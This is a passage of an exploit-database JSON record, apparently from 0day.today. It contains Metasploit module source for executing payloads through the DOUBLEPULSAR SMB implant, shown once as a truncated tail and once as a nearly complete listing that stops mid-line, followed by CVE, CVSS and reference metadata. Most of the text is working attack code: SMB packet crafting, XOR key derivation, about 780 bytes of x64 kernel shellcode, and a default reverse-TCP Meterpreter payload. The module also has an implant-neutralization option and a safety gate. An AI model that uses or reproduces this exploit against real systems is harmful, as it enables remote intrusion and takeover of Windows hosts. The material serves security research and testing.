ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-23] #"}, "lastseen": "2021-10-23T18:17:17", "differentElements": ["sourceData"], "edition": 53}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3d39c3aa4be25350cb1a1a9e60573505", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-23T22:15:43", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": 
"zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33895"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96704", "SMNTC-96709", "SMNTC-96705", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-23T22:15:43", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-23T22:15:43", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + 